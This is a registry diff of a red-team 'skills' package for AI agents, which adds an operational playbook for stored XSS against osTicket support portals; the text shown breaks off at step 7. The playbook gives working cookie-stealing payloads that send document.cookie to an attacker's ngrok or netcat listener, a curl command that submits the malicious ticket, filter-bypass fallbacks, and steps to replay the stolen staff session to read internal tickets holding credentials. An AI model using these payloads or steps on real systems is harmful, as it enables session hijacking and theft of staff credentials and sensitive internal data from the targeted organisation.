rtexit-method 0.1.0 → 0.1.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +2 -5
- package/packaged-assets/.agents/skills/rt-active-recon/SKILL.md +767 -0
- package/packaged-assets/.agents/skills/rt-active-recon/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-agent-breaker/SKILL.md +65 -0
- package/packaged-assets/.agents/skills/rt-agent-breaker/customize.toml +76 -0
- package/packaged-assets/.agents/skills/rt-agent-commander/SKILL.md +63 -0
- package/packaged-assets/.agents/skills/rt-agent-commander/customize.toml +67 -0
- package/packaged-assets/.agents/skills/rt-agent-ghost/SKILL.md +65 -0
- package/packaged-assets/.agents/skills/rt-agent-ghost/customize.toml +77 -0
- package/packaged-assets/.agents/skills/rt-agent-navigator/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-agent-navigator/customize.toml +61 -0
- package/packaged-assets/.agents/skills/rt-agent-phantom/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-agent-phantom/customize.toml +62 -0
- package/packaged-assets/.agents/skills/rt-agent-scout/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-agent-scout/customize.toml +61 -0
- package/packaged-assets/.agents/skills/rt-agent-scribe/SKILL.md +65 -0
- package/packaged-assets/.agents/skills/rt-agent-scribe/customize.toml +77 -0
- package/packaged-assets/.agents/skills/rt-attack-chain-builder/SKILL.md +476 -0
- package/packaged-assets/.agents/skills/rt-attack-chain-builder/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-attack-surface-map/SKILL.md +1209 -0
- package/packaged-assets/.agents/skills/rt-attack-surface-map/template.md +62 -0
- package/packaged-assets/.agents/skills/rt-autodoc/SKILL.md +258 -0
- package/packaged-assets/.agents/skills/rt-c2-operations/SKILL.md +1072 -0
- package/packaged-assets/.agents/skills/rt-c2-operations/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-compliance-mapper/SKILL.md +773 -0
- package/packaged-assets/.agents/skills/rt-create-sead/SKILL.md +74 -0
- package/packaged-assets/.agents/skills/rt-create-sead/template.md +89 -0
- package/packaged-assets/.agents/skills/rt-create-sead/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-credential-access/SKILL.md +756 -0
- package/packaged-assets/.agents/skills/rt-credential-hunt/SKILL.md +856 -0
- package/packaged-assets/.agents/skills/rt-credential-hunt/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-cvss-calculator/SKILL.md +542 -0
- package/packaged-assets/.agents/skills/rt-cvss-calculator/cvss4-matrix.csv +20 -0
- package/packaged-assets/.agents/skills/rt-data-exfiltration/SKILL.md +784 -0
- package/packaged-assets/.agents/skills/rt-defense-evasion/SKILL.md +987 -0
- package/packaged-assets/.agents/skills/rt-evidence-chain/SKILL.md +712 -0
- package/packaged-assets/.agents/skills/rt-evidence-chain/template.md +31 -0
- package/packaged-assets/.agents/skills/rt-executive-report/SKILL.md +718 -0
- package/packaged-assets/.agents/skills/rt-executive-report/template.md +38 -0
- package/packaged-assets/.agents/skills/rt-executive-report/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-active-directory/SKILL.md +1078 -0
- package/packaged-assets/.agents/skills/rt-exploit-active-directory/ad-checklist.csv +12 -0
- package/packaged-assets/.agents/skills/rt-exploit-active-directory/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-android/SKILL.md +1329 -0
- package/packaged-assets/.agents/skills/rt-exploit-android/masvs-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-exploit-android/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-api/SKILL.md +1547 -0
- package/packaged-assets/.agents/skills/rt-exploit-api/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-auth/SKILL.md +1949 -0
- package/packaged-assets/.agents/skills/rt-exploit-auth/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-bec/SKILL.md +69 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-aws/SKILL.md +865 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-aws/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-azure/SKILL.md +1258 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-gcp/SKILL.md +981 -0
- package/packaged-assets/.agents/skills/rt-exploit-containers/SKILL.md +55 -0
- package/packaged-assets/.agents/skills/rt-exploit-databases/SKILL.md +1374 -0
- package/packaged-assets/.agents/skills/rt-exploit-desktop-mac/SKILL.md +834 -0
- package/packaged-assets/.agents/skills/rt-exploit-desktop-win/SKILL.md +903 -0
- package/packaged-assets/.agents/skills/rt-exploit-desktop-win/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-dotnet/SKILL.md +945 -0
- package/packaged-assets/.agents/skills/rt-exploit-elasticsearch/SKILL.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-electron/SKILL.md +1023 -0
- package/packaged-assets/.agents/skills/rt-exploit-electron/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-file-upload/SKILL.md +1576 -0
- package/packaged-assets/.agents/skills/rt-exploit-file-upload/payloads/README.md +4 -0
- package/packaged-assets/.agents/skills/rt-exploit-file-upload/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-firebase/SKILL.md +54 -0
- package/packaged-assets/.agents/skills/rt-exploit-frameworks/SKILL.md +967 -0
- package/packaged-assets/.agents/skills/rt-exploit-idor/SKILL.md +1693 -0
- package/packaged-assets/.agents/skills/rt-exploit-idor/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-injection/SKILL.md +1860 -0
- package/packaged-assets/.agents/skills/rt-exploit-injection/payloads/sqlmap-tampers.txt +22 -0
- package/packaged-assets/.agents/skills/rt-exploit-injection/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-ios/SKILL.md +1214 -0
- package/packaged-assets/.agents/skills/rt-exploit-ios/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-iot/SKILL.md +91 -0
- package/packaged-assets/.agents/skills/rt-exploit-iot/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-java/SKILL.md +1009 -0
- package/packaged-assets/.agents/skills/rt-exploit-jwt/SKILL.md +1327 -0
- package/packaged-assets/.agents/skills/rt-exploit-jwt/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-mongodb/SKILL.md +67 -0
- package/packaged-assets/.agents/skills/rt-exploit-mssql/SKILL.md +52 -0
- package/packaged-assets/.agents/skills/rt-exploit-mysql/SKILL.md +53 -0
- package/packaged-assets/.agents/skills/rt-exploit-network/SKILL.md +118 -0
- package/packaged-assets/.agents/skills/rt-exploit-network/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-nodejs/SKILL.md +852 -0
- package/packaged-assets/.agents/skills/rt-exploit-osticket/SKILL.md +63 -0
- package/packaged-assets/.agents/skills/rt-exploit-phishing/SKILL.md +173 -0
- package/packaged-assets/.agents/skills/rt-exploit-phishing/templates/README.md +4 -0
- package/packaged-assets/.agents/skills/rt-exploit-phishing/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-php/SKILL.md +1119 -0
- package/packaged-assets/.agents/skills/rt-exploit-physical/SKILL.md +63 -0
- package/packaged-assets/.agents/skills/rt-exploit-physical/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-postgresql/SKILL.md +67 -0
- package/packaged-assets/.agents/skills/rt-exploit-python/SKILL.md +986 -0
- package/packaged-assets/.agents/skills/rt-exploit-redis/SKILL.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-ruby/SKILL.md +61 -0
- package/packaged-assets/.agents/skills/rt-exploit-scada/SKILL.md +1091 -0
- package/packaged-assets/.agents/skills/rt-exploit-ssrf/SKILL.md +1528 -0
- package/packaged-assets/.agents/skills/rt-exploit-ssrf/payloads.txt +23 -0
- package/packaged-assets/.agents/skills/rt-exploit-ssrf/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-vishing/SKILL.md +121 -0
- package/packaged-assets/.agents/skills/rt-exploit-vishing/scripts.md +4 -0
- package/packaged-assets/.agents/skills/rt-exploit-web/SKILL.md +1902 -0
- package/packaged-assets/.agents/skills/rt-exploit-web/owasp-checklist.csv +14 -0
- package/packaged-assets/.agents/skills/rt-exploit-web/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-wireless/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-exploit-wordpress/SKILL.md +1565 -0
- package/packaged-assets/.agents/skills/rt-exploit-wordpress/cves.csv +7 -0
- package/packaged-assets/.agents/skills/rt-exploit-wordpress/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-xss/SKILL.md +1526 -0
- package/packaged-assets/.agents/skills/rt-exploit-xss/payloads.txt +18 -0
- package/packaged-assets/.agents/skills/rt-exploit-xss/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-finding-document/SKILL.md +687 -0
- package/packaged-assets/.agents/skills/rt-finding-document/template.md +71 -0
- package/packaged-assets/.agents/skills/rt-finding-document/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-finding-tracker/SKILL.md +216 -0
- package/packaged-assets/.agents/skills/rt-finding-tracker/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-help/SKILL.md +292 -0
- package/packaged-assets/.agents/skills/rt-help/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-js-analysis/SKILL.md +639 -0
- package/packaged-assets/.agents/skills/rt-js-analysis/patterns.txt +27 -0
- package/packaged-assets/.agents/skills/rt-js-analysis/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-kill-chain-map/SKILL.md +393 -0
- package/packaged-assets/.agents/skills/rt-lateral-movement/SKILL.md +1032 -0
- package/packaged-assets/.agents/skills/rt-lateral-movement/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-methodology-selector/SKILL.md +69 -0
- package/packaged-assets/.agents/skills/rt-methodology-selector/frameworks.csv +10 -0
- package/packaged-assets/.agents/skills/rt-methodology-selector/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-mitre-map/SKILL.md +668 -0
- package/packaged-assets/.agents/skills/rt-mitre-map/tactics.csv +16 -0
- package/packaged-assets/.agents/skills/rt-mitre-map/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-osint/SKILL.md +775 -0
- package/packaged-assets/.agents/skills/rt-osint/osint-sources.csv +12 -0
- package/packaged-assets/.agents/skills/rt-osint/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-party-mode/SKILL.md +249 -0
- package/packaged-assets/.agents/skills/rt-party-mode/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-persistence/SKILL.md +1146 -0
- package/packaged-assets/.agents/skills/rt-persistence/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-poc-writer/SKILL.md +640 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/SKILL.md +998 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/linux-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/windows-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/SKILL.md +1027 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/linux-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/win-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-remediation-roadmap/SKILL.md +665 -0
- package/packaged-assets/.agents/skills/rt-remediation-roadmap/template.md +28 -0
- package/packaged-assets/.agents/skills/rt-risk-matrix/SKILL.md +232 -0
- package/packaged-assets/.agents/skills/rt-rules-of-engagement/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-rules-of-engagement/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-scenario-c001/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-c002/SKILL.md +69 -0
- package/packaged-assets/.agents/skills/rt-scenario-c003/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-c004/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-c005/SKILL.md +72 -0
- package/packaged-assets/.agents/skills/rt-scenario-d001/SKILL.md +378 -0
- package/packaged-assets/.agents/skills/rt-scenario-d002/SKILL.md +392 -0
- package/packaged-assets/.agents/skills/rt-scenario-d003/SKILL.md +522 -0
- package/packaged-assets/.agents/skills/rt-scenario-d004/SKILL.md +373 -0
- package/packaged-assets/.agents/skills/rt-scenario-d005/SKILL.md +458 -0
- package/packaged-assets/.agents/skills/rt-scenario-library/SKILL.md +292 -0
- package/packaged-assets/.agents/skills/rt-scenario-library/scenarios.csv +32 -0
- package/packaged-assets/.agents/skills/rt-scenario-m001/SKILL.md +796 -0
- package/packaged-assets/.agents/skills/rt-scenario-m002/SKILL.md +723 -0
- package/packaged-assets/.agents/skills/rt-scenario-m003/SKILL.md +463 -0
- package/packaged-assets/.agents/skills/rt-scenario-m004/SKILL.md +449 -0
- package/packaged-assets/.agents/skills/rt-scenario-m005/SKILL.md +505 -0
- package/packaged-assets/.agents/skills/rt-scenario-n001/SKILL.md +573 -0
- package/packaged-assets/.agents/skills/rt-scenario-n002/SKILL.md +112 -0
- package/packaged-assets/.agents/skills/rt-scenario-n003/SKILL.md +100 -0
- package/packaged-assets/.agents/skills/rt-scenario-n004/SKILL.md +90 -0
- package/packaged-assets/.agents/skills/rt-scenario-n005/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-w001/SKILL.md +635 -0
- package/packaged-assets/.agents/skills/rt-scenario-w002/SKILL.md +612 -0
- package/packaged-assets/.agents/skills/rt-scenario-w003/SKILL.md +449 -0
- package/packaged-assets/.agents/skills/rt-scenario-w004/SKILL.md +648 -0
- package/packaged-assets/.agents/skills/rt-scenario-w005/SKILL.md +479 -0
- package/packaged-assets/.agents/skills/rt-scenario-w006/SKILL.md +443 -0
- package/packaged-assets/.agents/skills/rt-scenario-w007/SKILL.md +494 -0
- package/packaged-assets/.agents/skills/rt-scenario-w008/SKILL.md +576 -0
- package/packaged-assets/.agents/skills/rt-scenario-w009/SKILL.md +518 -0
- package/packaged-assets/.agents/skills/rt-scenario-w010/SKILL.md +574 -0
- package/packaged-assets/.agents/skills/rt-scope-definition/SKILL.md +79 -0
- package/packaged-assets/.agents/skills/rt-scope-definition/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-shodan-recon/SKILL.md +880 -0
- package/packaged-assets/.agents/skills/rt-status/SKILL.md +64 -0
- package/packaged-assets/.agents/skills/rt-subdomain-enum/SKILL.md +906 -0
- package/packaged-assets/.agents/skills/rt-subdomain-enum/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-technical-report/SKILL.md +710 -0
- package/packaged-assets/.agents/skills/rt-technical-report/template.md +41 -0
- package/packaged-assets/.agents/skills/rt-technical-report/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-threat-model/SKILL.md +59 -0
- package/packaged-assets/.agents/skills/rt-threat-model/template.md +32 -0
- package/packaged-assets/.agents/skills/rt-threat-model/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-timeline/SKILL.md +338 -0
- package/packaged-assets/RTEXIT.md +127 -0
- package/tools/installer/lib/asset-manifest.js +10 -5
- package/tools/installer/lib/copy-assets.js +5 -2
- /package/{_rtexit → packaged-assets/_rtexit}/config.toml +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/config.user.toml +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/custom/config.toml +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/autodoc_engine.py +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/finding_tracker.py +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/resolve_config.py +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/resolve_customization.py +0 -0
- /package/{resources → packaged-assets/resources}/certifications.md +0 -0
- /package/{resources → packaged-assets/resources}/payloads.md +0 -0
- /package/{resources → packaged-assets/resources}/tools.md +0 -0
- /package/{resources → packaged-assets/resources}/wordlists.md +0 -0
- /package/{templates → packaged-assets/templates}/attack-chain-template.md +0 -0
- /package/{templates → packaged-assets/templates}/executive-report-template.md +0 -0
- /package/{templates → packaged-assets/templates}/executive-report.md +0 -0
- /package/{templates → packaged-assets/templates}/finding-template.md +0 -0
- /package/{templates → packaged-assets/templates}/remediation-roadmap.md +0 -0
- /package/{templates → packaged-assets/templates}/sead-template.md +0 -0
- /package/{templates → packaged-assets/templates}/technical-report.md +0 -0
|
@@ -0,0 +1,449 @@
|
|
|
1
|
+
---
|
|
2
|
+
name: rt-scenario-w003
|
|
3
|
+
description: "W-003: Stored XSS → IT Staff Session Hijack → Internal Data Access. Domain: web. Attack chain: find ticket portal → submit XSS payload → IT staff opens ticket → cookie stolen → login as staff → read all internal tickets. MITRE: T1059.007 → T1539 → T1078. Real example: Almentor: osTicket /open.php → XSS in subject → IT staff cookie → server passwords in tickets"
|
|
4
|
+
---
|
|
5
|
+
|
|
6
|
+
# W-003: Stored XSS → IT Staff Session Hijack → Internal Data Access
|
|
7
|
+
|
|
8
|
+
## Overview
|
|
9
|
+
|
|
10
|
+
| Property | Value |
|
|
11
|
+
|---|---|
|
|
12
|
+
| Attack Objective | Steal IT staff session cookies via stored XSS in a support ticket portal, then impersonate staff to read all internal tickets (which may contain credentials, server passwords, and sensitive infrastructure data) |
|
|
13
|
+
| Required Access Level | None (unauthenticated — attacker only needs the ability to submit a support ticket) |
|
|
14
|
+
| Estimated Time to Execute | 30–90 minutes from initial reconnaissance to session hijack |
|
|
15
|
+
| Detection Risk Level | Low (XSS payload fires client-side; no server-side anomaly until the stolen session is used) |
|
|
16
|
+
|
|
17
|
+
---
|
|
18
|
+
|
|
19
|
+
## Prerequisites
|
|
20
|
+
|
|
21
|
+
### Required Tools
|
|
22
|
+
|
|
23
|
+
```bash
|
|
24
|
+
# Netcat — cookie exfiltration listener
|
|
25
|
+
sudo apt install netcat-traditional -y
|
|
26
|
+
|
|
27
|
+
# Alternatively, use ngrok for public HTTPS callback URL
|
|
28
|
+
curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null
|
|
29
|
+
echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list
|
|
30
|
+
sudo apt update && sudo apt install ngrok
|
|
31
|
+
|
|
32
|
+
# BurpSuite Community (optional — for payload crafting and request interception)
|
|
33
|
+
# Download from: https://portswigger.net/burp/communitydownload
|
|
34
|
+
|
|
35
|
+
# curl — for ticket submission and session replay
|
|
36
|
+
sudo apt install curl -y
|
|
37
|
+
|
|
38
|
+
# Python3 http.server — lightweight exfil listener alternative
|
|
39
|
+
python3 -m http.server 8888
|
|
40
|
+
```
|
|
41
|
+
|
|
42
|
+
### Required Conditions
|
|
43
|
+
|
|
44
|
+
- Public or intranet-accessible osTicket (or similar) support portal with a ticket submission endpoint
|
|
45
|
+
- No HttpOnly flag on session cookies (required for JavaScript cookie theft)
|
|
46
|
+
- XSS sink in a field rendered to IT staff without sanitisation (subject, message body, custom field)
|
|
47
|
+
- Attacker controls an HTTP/HTTPS endpoint reachable from the victim's browser (cookie exfil destination)
|
|
48
|
+
|
|
49
|
+
### Skill Level
|
|
50
|
+
|
|
51
|
+
**INTERMEDIATE** — requires understanding of XSS payload construction, cookie exfiltration, and HTTP session replay. No exploit framework required.
|
|
52
|
+
|
|
53
|
+
---
|
|
54
|
+
|
|
55
|
+
## Attack Chain
|
|
56
|
+
|
|
57
|
+
```
|
|
58
|
+
[ATTACKER]
|
|
59
|
+
|
|
|
60
|
+
|-- 1. DISCOVER ticket portal endpoint
|
|
61
|
+
| osTicket: /open.php, /support/, /helpdesk/
|
|
62
|
+
|
|
|
63
|
+
|-- 2. CRAFT stored XSS payload
|
|
64
|
+
| Inject <script> into ticket Subject or Body field
|
|
65
|
+
|
|
|
66
|
+
|-- 3. SUBMIT ticket
|
|
67
|
+
| POST /open.php — payload stored in database
|
|
68
|
+
|
|
|
69
|
+
|-- 4. WAIT for IT staff to open ticket
|
|
70
|
+
| Staff views ticket in /scp/tickets.php
|
|
71
|
+
| Payload fires in staff browser
|
|
72
|
+
|
|
|
73
|
+
|-- 5. RECEIVE stolen session cookie
|
|
74
|
+
| Exfil listener captures document.cookie via HTTP GET
|
|
75
|
+
|
|
|
76
|
+
|-- 6. REPLAY stolen session
|
|
77
|
+
| Use Set-Cookie header to authenticate as IT staff
|
|
78
|
+
|
|
|
79
|
+
|-- 7. READ all internal tickets
|
|
80
|
+
| Browse /scp/tickets.php — access all internal data
|
|
81
|
+
```
|
|
82
|
+
|
|
83
|
+
### MITRE ATT&CK Chain
|
|
84
|
+
|
|
85
|
+
| Phase | Technique |
|
|
86
|
+
|---|---|
|
|
87
|
+
| Payload Injection | T1059.007 — Command and Scripting Interpreter: JavaScript |
|
|
88
|
+
| Session Theft | T1539 — Steal Web Session Cookie |
|
|
89
|
+
| Account Access | T1078 — Valid Accounts |
|
|
90
|
+
|
|
91
|
+
---
|
|
92
|
+
|
|
93
|
+
## Step-by-Step Execution
|
|
94
|
+
|
|
95
|
+
### Step 1 — Discover the Ticket Portal
|
|
96
|
+
|
|
97
|
+
**Objective:** Confirm the osTicket endpoint is publicly accessible and identify the submission form.
|
|
98
|
+
|
|
99
|
+
```bash
|
|
100
|
+
# Probe the known osTicket paths
|
|
101
|
+
curl -s -o /dev/null -w "%{http_code}" https://TARGET/open.php
|
|
102
|
+
curl -s -o /dev/null -w "%{http_code}" https://TARGET/support/open.php
|
|
103
|
+
curl -s -o /dev/null -w "%{http_code}" https://TARGET/helpdesk/open.php
|
|
104
|
+
|
|
105
|
+
# Spider for ticket-related paths
|
|
106
|
+
gobuster dir -u https://TARGET -w /usr/share/wordlists/dirb/common.txt \
|
|
107
|
+
-x php,html --no-error -q | grep -i "ticket\|support\|open\|help"
|
|
108
|
+
```
|
|
109
|
+
|
|
110
|
+
**Expected Output:**
|
|
111
|
+
```
|
|
112
|
+
200 → /open.php found
|
|
113
|
+
```
|
|
114
|
+
|
|
115
|
+
**Fallback:** If gobuster finds nothing, check page source of the main site for links to `/support` or `/helpdesk`. Also try Shodan: `shodan search "osTicket" hostname:TARGET`.
|
|
116
|
+
|
|
117
|
+
---
|
|
118
|
+
|
|
119
|
+
### Step 2 — Start the Cookie Exfiltration Listener
|
|
120
|
+
|
|
121
|
+
**Objective:** Stand up a listener that will receive the stolen cookie.
|
|
122
|
+
|
|
123
|
+
```bash
|
|
124
|
+
# Option A — netcat listener (works on same machine with port forwarding)
|
|
125
|
+
nc -lvnp 8888
|
|
126
|
+
|
|
127
|
+
# Option B — Python HTTP server (logs full GET requests including cookie param)
|
|
128
|
+
mkdir /tmp/xss-catch && cd /tmp/xss-catch
|
|
129
|
+
python3 -m http.server 8888
|
|
130
|
+
|
|
131
|
+
# Option C — ngrok public HTTPS tunnel (best for bypassing same-site restrictions)
|
|
132
|
+
ngrok http 8888
|
|
133
|
+
# Note the public URL: https://XXXX.ngrok.io
|
|
134
|
+
```
|
|
135
|
+
|
|
136
|
+
**Expected Output (ngrok):**
|
|
137
|
+
```
|
|
138
|
+
Forwarding https://abc123.ngrok.io -> http://localhost:8888
|
|
139
|
+
```
|
|
140
|
+
|
|
141
|
+
Store your exfil URL:
|
|
142
|
+
```bash
|
|
143
|
+
EXFIL_URL="https://abc123.ngrok.io"
|
|
144
|
+
```
|
|
145
|
+
|
|
146
|
+
---
|
|
147
|
+
|
|
148
|
+
### Step 3 — Craft the XSS Payload
|
|
149
|
+
|
|
150
|
+
**Objective:** Build a JavaScript payload that exfiltrates the IT staff's session cookie to your listener.
|
|
151
|
+
|
|
152
|
+
**Basic payload (URL-safe):**
|
|
153
|
+
```javascript
|
|
154
|
+
<script>new Image().src='EXFIL_URL/?c='+encodeURIComponent(document.cookie)</script>
|
|
155
|
+
```
|
|
156
|
+
|
|
157
|
+
**Obfuscated payload (bypass naive filters):**
|
|
158
|
+
```javascript
|
|
159
|
+
<img src=x onerror="fetch('EXFIL_URL/?c='+btoa(document.cookie))">
|
|
160
|
+
```
|
|
161
|
+
|
|
162
|
+
**SVG-based payload (bypass tag filters):**
|
|
163
|
+
```xml
|
|
164
|
+
<svg onload="var x=new XMLHttpRequest();x.open('GET','EXFIL_URL/?c='+document.cookie);x.send()">
|
|
165
|
+
```
|
|
166
|
+
|
|
167
|
+
**Cookie + URL exfil (maximum context):**
|
|
168
|
+
```javascript
|
|
169
|
+
<script>
|
|
170
|
+
var d=document.cookie;
|
|
171
|
+
var u=window.location.href;
|
|
172
|
+
new Image().src='EXFIL_URL/?c='+encodeURIComponent(d)+'&u='+encodeURIComponent(u);
|
|
173
|
+
</script>
|
|
174
|
+
```
|
|
175
|
+
|
|
176
|
+
Replace `EXFIL_URL` with your ngrok/netcat endpoint before use.
|
|
177
|
+
|
|
178
|
+
---
|
|
179
|
+
|
|
180
|
+
### Step 4 — Submit the Malicious Ticket
|
|
181
|
+
|
|
182
|
+
**Objective:** Store the XSS payload in a field rendered to IT staff.
|
|
183
|
+
|
|
184
|
+
**Option A — Browser (manual):**
|
|
185
|
+
|
|
186
|
+
1. Navigate to `https://TARGET/open.php`
|
|
187
|
+
2. Fill in required fields (name, email — use disposable details)
|
|
188
|
+
3. In the **Subject** field, paste your XSS payload
|
|
189
|
+
4. If the subject is length-restricted, try the **Message Body** or any custom field
|
|
190
|
+
5. Submit the ticket
|
|
191
|
+
|
|
192
|
+
**Option B — curl (scripted):**
|
|
193
|
+
|
|
194
|
+
```bash
|
|
195
|
+
curl -s -X POST "https://TARGET/open.php" \
|
|
196
|
+
-H "Content-Type: application/x-www-form-urlencoded" \
|
|
197
|
+
--data-urlencode "name=John Smith" \
|
|
198
|
+
--data-urlencode "email=john.smith.test@mailinator.com" \
|
|
199
|
+
--data-urlencode "subject=<script>new Image().src='${EXFIL_URL}/?c='+encodeURIComponent(document.cookie)</script>" \
|
|
200
|
+
--data-urlencode "message=I need assistance with my account access." \
|
|
201
|
+
--data-urlencode "topicId=1"
|
|
202
|
+
```
|
|
203
|
+
|
|
204
|
+
**Expected Output:**
|
|
205
|
+
```
|
|
206
|
+
HTTP 200 or redirect to ticket confirmation page
|
|
207
|
+
Ticket #XXXX created
|
|
208
|
+
```
|
|
209
|
+
|
|
210
|
+
**Fallback:** If the Subject field is sanitised, try:
|
|
211
|
+
- Message body (rich-text editors often allow raw HTML)
|
|
212
|
+
- Custom fields (phone, company name)
|
|
213
|
+
- Attachment filename (some portals render filenames)
|
|
214
|
+
- Use double-encoding: `%3Cscript%3E...` if the server decodes once before storing
|
|
215
|
+
|
|
216
|
+
---
|
|
217
|
+
|
|
218
|
+
### Step 5 — Wait for IT Staff to Open the Ticket
|
|
219
|
+
|
|
220
|
+
**Objective:** The payload fires automatically when any IT staff member views the ticket in the staff control panel.
|
|
221
|
+
|
|
222
|
+
osTicket staff view paths:
|
|
223
|
+
- `/scp/tickets.php` — ticket list
|
|
224
|
+
- `/scp/tickets.php?id=TICKET_ID` — individual ticket view
|
|
225
|
+
|
|
226
|
+
Typical response time: minutes to hours depending on support SLA.
|
|
227
|
+
|
|
228
|
+
Monitor your exfil listener:
|
|
229
|
+
|
|
230
|
+
```bash
|
|
231
|
+
# If using Python http.server, watch the log:
|
|
232
|
+
# 192.168.1.x - - [DATE] "GET /?c=COOKIE_VALUE HTTP/1.1" 200 -
|
|
233
|
+
|
|
234
|
+
# If using ngrok web UI:
|
|
235
|
+
open http://127.0.0.1:4040
|
|
236
|
+
```
|
|
237
|
+
|
|
238
|
+
**Expected Output (listener receives):**
|
|
239
|
+
```
|
|
240
|
+
GET /?c=OSTSESSID%3Dabc123def456; Path=/; ... HTTP/1.1
|
|
241
|
+
```
|
|
242
|
+
|
|
243
|
+
---
|
|
244
|
+
|
|
245
|
+
### Step 6 — Extract and Replay the Stolen Cookie
|
|
246
|
+
|
|
247
|
+
**Objective:** Use the stolen session cookie to authenticate as the IT staff member.
|
|
248
|
+
|
|
249
|
+
```bash
|
|
250
|
+
# Decode the captured cookie value
|
|
251
|
+
python3 -c "import urllib.parse; print(urllib.parse.unquote('ENCODED_COOKIE_VALUE'))"
|
|
252
|
+
|
|
253
|
+
# Store the clean cookie
|
|
254
|
+
STOLEN_COOKIE="OSTSESSID=abc123def456"
|
|
255
|
+
|
|
256
|
+
# Verify session is valid — should return the staff dashboard
|
|
257
|
+
curl -s -b "$STOLEN_COOKIE" "https://TARGET/scp/index.php" | grep -i "welcome\|dashboard\|logged"
|
|
258
|
+
```
|
|
259
|
+
|
|
260
|
+
**Expected Output:**
|
|
261
|
+
```html
|
|
262
|
+
<h1>Welcome, IT Admin</h1>
|
|
263
|
+
<!-- or any authenticated staff page content -->
|
|
264
|
+
```
|
|
265
|
+
|
|
266
|
+
**Fallback:** If the session has expired, wait for the IT staff member to re-open the ticket (re-trigger the payload). Alternatively, try other cookies captured in the same request.
|
|
267
|
+
|
|
268
|
+
---
|
|
269
|
+
|
|
270
|
+
### Step 7 — Access All Internal Tickets
|
|
271
|
+
|
|
272
|
+
**Objective:** Read all internal support tickets, searching for sensitive data such as server passwords, credentials, and infrastructure details.
|
|
273
|
+
|
|
274
|
+
```bash
|
|
275
|
+
# List all tickets (staff view)
|
|
276
|
+
